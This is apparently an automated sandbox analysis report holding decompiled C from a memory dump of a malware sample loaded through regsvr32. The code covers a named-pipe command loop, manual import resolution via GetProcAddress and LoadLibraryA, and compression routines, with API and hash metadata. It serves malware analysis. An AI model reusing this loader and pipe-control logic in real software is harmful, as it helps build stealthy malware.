                                                                                                                                                                        					_t75 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_push(0x80000);
                                                                                                                                                                        					_push( *0x537f8bc);
                                                                                                                                                                        					_push( *0x537f804);
                                                                                                                                                                        					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						goto L56;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t149 =  *0x537f8bc; // 0x0
                                                                                                                                                                        						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                        						_t214 = _t80 - 8;
                                                                                                                                                                        						if(_t214 > 0) {
                                                                                                                                                                        							_t81 = _t80 - 9;
                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                        							if(_t81 == 0) {
                                                                                                                                                                        								E05370962( &_v200);
                                                                                                                                                                        								L12:
                                                                                                                                                                        								_t84 =  &_v200;
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_push(4);
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_push(_t84);
                                                                                                                                                                        								_push(5);
                                                                                                                                                                        								L31:
                                                                                                                                                                        								_pop(_t187);
                                                                                                                                                                        								E0536D1A6(_t187);
                                                                                                                                                                        								L32:
                                                                                                                                                                        								L56:
                                                                                                                                                                        								DisconnectNamedPipe( *0x537f804);
                                                                                                                                                                        								_push(0);
                                                                                                                                                                        								_pop(0);
                                                                                                                                                                        								if(_v172 == 0) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t87 = _t81;
                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                        								_v204 = 0;
                                                                                                                                                                        								_t88 = E0536171A( &_v204, _t221);
                                                                                                                                                                        								_v188 = _t88;
                                                                                                                                                                        								__eflags = _t88;
                                                                                                                                                                        								if(_t88 == 0) {
                                                                                                                                                                        									_push(4);
                                                                                                                                                                        									_v192 = 0;
                                                                                                                                                                        									_push( &_v192);
                                                                                                                                                                        									L19:
                                                                                                                                                                        									_push(0xa);
                                                                                                                                                                        									goto L31;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t146 = _v204;
                                                                                                                                                                        								_t90 = _t146 * 0x16;
                                                                                                                                                                        								_v184 = _t146 * 0x16;
                                                                                                                                                                        								_t203 = E05368BDE(_t90);
                                                                                                                                                                        								_v192 = _t203;
                                                                                                                                                                        								__eflags = _t203;
                                                                                                                                                                        								if(_t203 == 0) {
                                                                                                                                                                        									_t64 =  &_v192;
                                                                                                                                                                        									 *_t64 = _v192 & 0x00000000;
                                                                                                                                                                        									__eflags =  *_t64;
                                                                                                                                                                        									_push(4);
                                                                                                                                                                        									_push( &_v192);
                                                                                                                                                                        									_t188 = 0xa;
                                                                                                                                                                        									E0536D1A6(_t188);
                                                                                                                                                                        									L52:
                                                                                                                                                                        									E05368BF4( &_v188, _t146);
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t199 = 0;
                                                                                                                                                                        								__eflags = _t146;
                                                                                                                                                                        								if(_t146 == 0) {
                                                                                                                                                                        									L50:
                                                                                                                                                                        									_push(E0536A43D(_t203));
                                                                                                                                                                        									_push(_t203);
                                                                                                                                                                        									_t189 = 5;
                                                                                                                                                                        									E0536D1A6(_t189);
                                                                                                                                                                        									E05368BF4( &_v192, 0xffffffff);
                                                                                                                                                                        									_t208 = _t208 + 0x10;
                                                                                                                                                                        									goto L52;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t159 = _v188 + 4;
                                                                                                                                                                        								__eflags = _t159;
                                                                                                                                                                        								_v204 = _t159;
                                                                                                                                                                        								do {
                                                                                                                                                                        									__eflags = _t199;
                                                                                                                                                                        									if(_t199 != 0) {
                                                                                                                                                                        										__eflags = _t199 - _t146 - 1;
                                                                                                                                                                        										if(_t199 < _t146 - 1) {
                                                                                                                                                                        											_t102 = E0536A43D(_t203);
                                                                                                                                                                        											_t159 = _v204;
                                                                                                                                                                        											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									_t100 =  *_t159;
                                                                                                                                                                        									_v196 = _t100;
                                                                                                                                                                        									__eflags = _t100;
                                                                                                                                                                        									if(_t100 != 0) {
                                                                                                                                                                        										_t103 = E0536A43D(_t203);
                                                                                                                                                                        										_t104 = _v204;
                                                                                                                                                                        										_push(_t104[1] & 0x0000ffff);
                                                                                                                                                                        										_push( *_t104 >> 0x18);
                                                                                                                                                                        										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                        										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                        										_t110 = E0536A43D(_t203) + _t203;
                                                                                                                                                                        										__eflags = _t110;
                                                                                                                                                                        										E05369E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                                                                                        										_t159 = _v204;
                                                                                                                                                                        										_t208 = _t208 + 0x20;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t199 = _t199 + 1;
                                                                                                                                                                        									_t159 = _t159 + 0x20;
                                                                                                                                                                        									_v204 = _t159;
                                                                                                                                                                        									__eflags = _t199 - _t146;
                                                                                                                                                                        								} while (_t199 < _t146);
                                                                                                                                                                        								goto L50;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t87 != 1;
                                                                                                                                                                        							if(_t87 != 1) {
                                                                                                                                                                        								goto L56;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v204 = 0;
                                                                                                                                                                        							_t113 = E0536171A( &_v204, _t221);
                                                                                                                                                                        							_t204 = _v204;
                                                                                                                                                                        							_v196 = _t113;
                                                                                                                                                                        							__eflags = _t113;
                                                                                                                                                                        							if(_t113 != 0) {
                                                                                                                                                                        								E05368BF4( &_v196, _t204);
                                                                                                                                                                        							}
                                                                                                                                                                        							_v204 = _t204 * 0x16;
                                                                                                                                                                        							_t84 =  &_v204;
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t214 == 0) {
                                                                                                                                                                        							_t84 = E05370962( &_v200);
                                                                                                                                                                        							L16:
                                                                                                                                                                        							__eflags = _t84;
                                                                                                                                                                        							if(_t84 == 0) {
                                                                                                                                                                        								_push(0);
                                                                                                                                                                        								_push(0);
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v200);
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t118 = _t80 - 1;
                                                                                                                                                                        						if(_t118 == 0) {
                                                                                                                                                                        							_t200 = E05369B33( &(_t149[4]), 0x20, 1,  &_v176);
                                                                                                                                                                        							_v196 = _t200;
                                                                                                                                                                        							__eflags = _t200;
                                                                                                                                                                        							if(_t200 == 0) {
                                                                                                                                                                        								L30:
                                                                                                                                                                        								_t192 =  *0x537f8bc; // 0x0
                                                                                                                                                                        								E05369EDB( &_v164,  &(_t192[4]), 0x80);
                                                                                                                                                                        								_push(0x84);
                                                                                                                                                                        								_push( &_v168);
                                                                                                                                                                        								_push(2);
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t205 = _v176;
                                                                                                                                                                        							__eflags = _t205 - 1;
                                                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                                                        								_t124 = E05361DD3(E05369F6F( *_t200, __eflags), 0, 0, 0);
                                                                                                                                                                        								_t208 = _t208 + 0x10;
                                                                                                                                                                        								_v168 = _t124;
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t125 = _t205 - 1;
                                                                                                                                                                        							_v184 = _t205 - 1;
                                                                                                                                                                        							_t127 = E05368BDE(_t125 << 2);
                                                                                                                                                                        							_v188 = _t127;
                                                                                                                                                                        							__eflags = _t127;
                                                                                                                                                                        							if(_t127 == 0) {
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t148 = 1;
                                                                                                                                                                        							__eflags = _t205 - 1;
                                                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                                                        								L28:
                                                                                                                                                                        								_t129 = E05361DD3(E05369F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                        								_t208 = _t208 + 0x10;
                                                                                                                                                                        								_v168 = _t129;
                                                                                                                                                                        								E05369C2C( &_v176);
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v204 = _t127;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t132 = E05369880( *((intOrPtr*)(_t200 + _t148 * 4)), E0536A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                        								_t183 = _v204;
                                                                                                                                                                        								_t148 = _t148 + 1;
                                                                                                                                                                        								 *_t183 = _t132;
                                                                                                                                                                        								_v204 = _t183 + 4;
                                                                                                                                                                        								__eflags = _t148 - _t205;
                                                                                                                                                                        							} while (__eflags < 0);
                                                                                                                                                                        							_t127 = _v188;
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t133 = _t118 - 3;
                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_t196 = 5;
                                                                                                                                                                        							E05365EC3(E0536D1A6(_t196));
                                                                                                                                                                        							_v172 = 1;
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t137 = _t133;
                                                                                                                                                                        						if(_t137 == 0) {
                                                                                                                                                                        							_t84 = E05370940( &_v200);
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t137 != 1) {
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						E05370940( &_v200);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}

                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363b11
                                                                                                                                                                        0x05363980
                                                                                                                                                                        0x05363980
                                                                                                                                                                        0x05363983
                                                                                                                                                                        0x053639c8
                                                                                                                                                                        0x053639cc
                                                                                                                                                                        0x053639d1
                                                                                                                                                                        0x053639d5
                                                                                                                                                                        0x053639d7
                                                                                                                                                                        0x05363ad8
                                                                                                                                                                        0x05363ade
                                                                                                                                                                        0x05363ae2
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x053639dd
                                                                                                                                                                        0x053639e1
                                                                                                                                                                        0x053639e5
                                                                                                                                                                        0x053639ee
                                                                                                                                                                        0x053639f0
                                                                                                                                                                        0x053639f5
                                                                                                                                                                        0x053639f7
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363abb
                                                                                                                                                                        0x05363abd
                                                                                                                                                                        0x05363ac0
                                                                                                                                                                        0x05363ac1
                                                                                                                                                                        0x05363ac8
                                                                                                                                                                        0x05363ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363ace
                                                                                                                                                                        0x053639fd
                                                                                                                                                                        0x053639ff
                                                                                                                                                                        0x05363a01
                                                                                                                                                                        0x05363a90
                                                                                                                                                                        0x05363a97
                                                                                                                                                                        0x05363a98
                                                                                                                                                                        0x05363a9b
                                                                                                                                                                        0x05363a9c
                                                                                                                                                                        0x05363aa8
                                                                                                                                                                        0x05363aad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363aad
                                                                                                                                                                        0x05363a0b
                                                                                                                                                                        0x05363a0b
                                                                                                                                                                        0x05363a0e
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363a14
                                                                                                                                                                        0x05363a19
                                                                                                                                                                        0x05363a1b
                                                                                                                                                                        0x05363a1e
                                                                                                                                                                        0x05363a24
                                                                                                                                                                        0x05363a28
                                                                                                                                                                        0x05363a28
                                                                                                                                                                        0x05363a1b
                                                                                                                                                                        0x05363a2e
                                                                                                                                                                        0x05363a30
                                                                                                                                                                        0x05363a34
                                                                                                                                                                        0x05363a36
                                                                                                                                                                        0x05363a39
                                                                                                                                                                        0x05363a40
                                                                                                                                                                        0x05363a49
                                                                                                                                                                        0x05363a4f
                                                                                                                                                                        0x05363a54
                                                                                                                                                                        0x05363a5d
                                                                                                                                                                        0x05363a75
                                                                                                                                                                        0x05363a75
                                                                                                                                                                        0x05363a78
                                                                                                                                                                        0x05363a7d
                                                                                                                                                                        0x05363a81
                                                                                                                                                                        0x05363a81
                                                                                                                                                                        0x05363a84
                                                                                                                                                                        0x05363a85
                                                                                                                                                                        0x05363a88
                                                                                                                                                                        0x05363a8c
                                                                                                                                                                        0x05363a8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363985
                                                                                                                                                                        0x05363988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363992
                                                                                                                                                                        0x05363996
                                                                                                                                                                        0x0536399b
                                                                                                                                                                        0x0536399f
                                                                                                                                                                        0x053639a3
                                                                                                                                                                        0x053639a5
                                                                                                                                                                        0x053639ad
                                                                                                                                                                        0x053639b3
                                                                                                                                                                        0x053639b7
                                                                                                                                                                        0x053639bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053639bb
                                                                                                                                                                        0x0536380a
                                                                                                                                                                        0x0536396c
                                                                                                                                                                        0x0536384c
                                                                                                                                                                        0x0536384d
                                                                                                                                                                        0x0536384f
                                                                                                                                                                        0x05363857
                                                                                                                                                                        0x05363858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363858
                                                                                                                                                                        0x05363851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363851
                                                                                                                                                                        0x05363810
                                                                                                                                                                        0x05363813
                                                                                                                                                                        0x0536388f
                                                                                                                                                                        0x05363891
                                                                                                                                                                        0x05363897
                                                                                                                                                                        0x05363899
                                                                                                                                                                        0x05363936
                                                                                                                                                                        0x05363936
                                                                                                                                                                        0x05363948
                                                                                                                                                                        0x0536394e
                                                                                                                                                                        0x05363957
                                                                                                                                                                        0x05363958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363958
                                                                                                                                                                        0x0536389f
                                                                                                                                                                        0x053638a3
                                                                                                                                                                        0x053638a6
                                                                                                                                                                        0x0536392a
                                                                                                                                                                        0x0536392f
                                                                                                                                                                        0x05363932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363932
                                                                                                                                                                        0x053638a8
                                                                                                                                                                        0x053638ab
                                                                                                                                                                        0x053638b3
                                                                                                                                                                        0x053638b8
                                                                                                                                                                        0x053638bd
                                                                                                                                                                        0x053638bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053638c3
                                                                                                                                                                        0x053638c4
                                                                                                                                                                        0x053638c6
                                                                                                                                                                        0x053638f5
                                                                                                                                                                        0x05363904
                                                                                                                                                                        0x05363909
                                                                                                                                                                        0x0536390c
                                                                                                                                                                        0x05363918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363918
                                                                                                                                                                        0x053638c8
                                                                                                                                                                        0x053638cc
                                                                                                                                                                        0x053638da
                                                                                                                                                                        0x053638df

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 053637B2
                                                                                                                                                                          • Part of subcall function 0536D1A6: FlushFileBuffers.KERNEL32(00000000,?,05363AC6,00000000,00000004), ref: 0536D1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 05363B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 0824b9d18ccd99b5c67ac2882c673a26c94b51265bf3d349501cb322596a83e8
                                                                                                                                                                        • Instruction ID: 545b7f97e6b7faffaad1e92819e151449db97bedd2caad520df123b25084e195
                                                                                                                                                                        • Opcode Fuzzy Hash: 0824b9d18ccd99b5c67ac2882c673a26c94b51265bf3d349501cb322596a83e8
                                                                                                                                                                        • Instruction Fuzzy Hash: 94A1BBB2A08305AFE315DF64C889A6AB7E8FB84310F04CD2EF15597288DB74D949CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0537370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				signed int* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        
                                                                                                                                                                        				_t167 = __ecx;
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                        					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                        					_v40 = E0536EFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        					_v32 = _v52;
                                                                                                                                                                        					_t109 = 8;
                                                                                                                                                                        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                        						L24:
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v56 = 0x80000000;
                                                                                                                                                                        					_t112 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_v8 = _v8 + 0x14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t115 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                        						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v8 == 0) {
                                                                                                                                                                        								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        								_v12 =  *_t43 + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v12 =  *_v8 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v28 = _v28 & 0x00000000;
                                                                                                                                                                        							while( *_v12 != 0) {
                                                                                                                                                                        								_v24 = _v24 & 0x00000000;
                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                        								_v64 = _v64 & 0x00000000;
                                                                                                                                                                        								_v20 = _v20 & 0x00000000;
                                                                                                                                                                        								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                        									_v60 =  *_v12 + _a4;
                                                                                                                                                                        									_v20 = _v60 + 2;
                                                                                                                                                                        									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v24 =  *_v12;
                                                                                                                                                                        									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_v24 != _v16) {
                                                                                                                                                                        									_v44 = _v44 + 1;
                                                                                                                                                                        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                        										 *_v12 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_v12 =  &(_v12[1]);
                                                                                                                                                                        								_v28 = _v28 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v8 = _v8 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t163 = 0xfffffffd;
                                                                                                                                                                        						return _t163;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L24;
                                                                                                                                                                        				}
                                                                                                                                                                        				return __eax | 0xffffffff;
                                                                                                                                                                        			}























                                                                                                                                                                        0x0537388b
                                                                                                                                                                        0x053738a7
                                                                                                                                                                        0x0537388d
                                                                                                                                                                        0x05373890
                                                                                                                                                                        0x0537389c
                                                                                                                                                                        0x0537389c
                                                                                                                                                                        0x0537388b
                                                                                                                                                                        0x053738af
                                                                                                                                                                        0x053738b8
                                                                                                                                                                        0x053738b8
                                                                                                                                                                        0x053738c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053738c6
                                                                                                                                                                        0x053737d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053737d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053737aa
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 05373728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 053737C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: fb11051b113ad2ed1083a7748a5db275794e834559ab29c802d18049df353d4a
                                                                                                                                                                        • Instruction ID: 009cfb9352fd7a386caf5fee4b118371cc9be5e8b5218e1ca1def9668f5e7982
                                                                                                                                                                        • Opcode Fuzzy Hash: fb11051b113ad2ed1083a7748a5db275794e834559ab29c802d18049df353d4a
                                                                                                                                                                        • Instruction Fuzzy Hash: C0618E75E10209EFDB11CF98C485BADBBF1FF08315F248599E815AB291C778AA84DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E05374100(int _a4, signed int _a8) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                        				intOrPtr* _t142;
                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				intOrPtr _t161;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				intOrPtr _t170;
                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				int _t184;
                                                                                                                                                                        				intOrPtr _t185;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				int _t202;
                                                                                                                                                                        				int _t208;
                                                                                                                                                                        				intOrPtr _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				int _t219;
                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                        				int _t224;
                                                                                                                                                                        				int _t225;
                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                        				int _t232;
                                                                                                                                                                        				int _t234;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				int _t239;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				int _t245;
                                                                                                                                                                        				int _t252;
                                                                                                                                                                        				signed int _t253;
                                                                                                                                                                        				int _t254;
                                                                                                                                                                        				void* _t257;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				int _t259;
                                                                                                                                                                        				intOrPtr _t260;
                                                                                                                                                                        				int _t261;
                                                                                                                                                                        				signed int _t269;
                                                                                                                                                                        				signed int _t271;
                                                                                                                                                                        				intOrPtr* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        
                                                                                                                                                                        				_t253 = _a8;
                                                                                                                                                                        				_t272 = _a4;
                                                                                                                                                                        				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        				_t228 =  *_t4;
                                                                                                                                                                        				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                        				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_t269 = 0;
                                                                                                                                                                        				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                        					_v12 = 0xffff;
                                                                                                                                                                        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                        					if(_t217 < _t141) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                        					_v8 = _t245;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                        					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                        					if(_t227 >= _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						if(_t253 != 4) {
                                                                                                                                                                        							L10:
                                                                                                                                                                        							_t269 = 0;
                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t285 = _t227 - _t195;
                                                                                                                                                                        							if(_t227 != _t195) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t269 = _t253 - 3;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						E05377120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                        						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                        						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                        						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                        						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E05375E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
